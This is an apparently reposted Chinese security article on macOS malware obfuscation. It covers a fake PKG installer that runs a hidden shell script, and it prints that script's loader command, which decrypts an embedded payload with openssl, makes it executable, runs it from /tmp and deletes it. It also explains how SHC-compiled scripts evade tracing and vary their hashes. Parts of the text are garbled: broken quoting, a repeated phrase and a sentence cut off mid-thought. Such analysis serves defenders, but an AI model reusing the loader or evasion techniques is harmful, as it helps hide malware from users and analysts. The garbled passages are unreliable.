MacOS 上常见的七种混淆技术
发布时间:2023-02-22 09:02:20 所属栏目:安全 来源:
导读:这是要求用户首先点击的客户端上安装 PKG 客户端的图标,其实相当于是一个隐藏客户端目录中的 Shell 脚本的别名,名称为 .hidden。该脚本经过轻微混淆,在 /tmp 目录下使用随机 12 个字符创建一个目录后,会完成去混
|
这是要求用户首先点击的客户端上安装 PKG 客户端的图标,其实相当于是一个隐藏客户端目录中的 Shell 脚本的别名,名称为 .hidden。该脚本经过轻微混淆,在 /tmp 目录下使用随机 12 个字符创建一个目录后,会完成去混淆执行并删除从同一目录中的数据文件中提取的可执行文件: 复制 /bin/bash -c eval '$(echo'openssl enc -aes-256-cbc -d -A -base64 -k \ '$archive\' - in \ '$appDir/$archive\'-out\ '$ tmpDir/$binFile\' xattr -c \ '$tmpDir/\' * chmod 777 \ '$tmpDir/$binFile\' \ '$tmpDir/$binFile\' && rm -rf $tmpDir ')' 混淆的 SHC Shell Script Compiler 是将 Bash 脚本编译生成可执行文件的技术,尽管这些可执行文件并不能做到完全独立,仍然需要执行环境中包含指定的 Shell。 SHC 的 -U 参数可以使编译后的二进制文件无法使用 ptrace 进行跟踪,-e 参数支持设置程序终止运行的到期日期。如果使用不同的 -e 参数,相同的脚本就可以生成不同哈希的二进制文件。 SHC 被 SCSSET 恶意软件大量使用,在野能够持续发现相关样本。从攻击者的角度来看,使得编写无法通过静态分析读取的恶意脚本变得非常简单。而且,通过 -e 参数还能够进一步无限数字化地生成具有不同数目的哈希值的样本集合的文件。 发现 SHC 编译的二进制文件,唯一的方法就是通过沙盒执行观察其行为。静态检测发现 SHC 编译的二进制文件时可以将其认为是可疑的,编译器生成的独特字符串也利于检测,但实际上只有通过执行才能准确区分是否恶意。 混淆的 Python 脚本 苹果公司已经在 Monterey 12.3 及更高版本的 macOS 设备上取消了对 Python 2.7 的支持,了对python2.7的支持,这意味着苹果将不再提供python2.7的开发环境。而在此之前,微软也宣布将于今年晚些时候停止对python2.7的支持。目前尚不清楚这两家公所以针对 macOS 平台的攻击者已经对 Python 不再热衷。 (编辑:银川站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐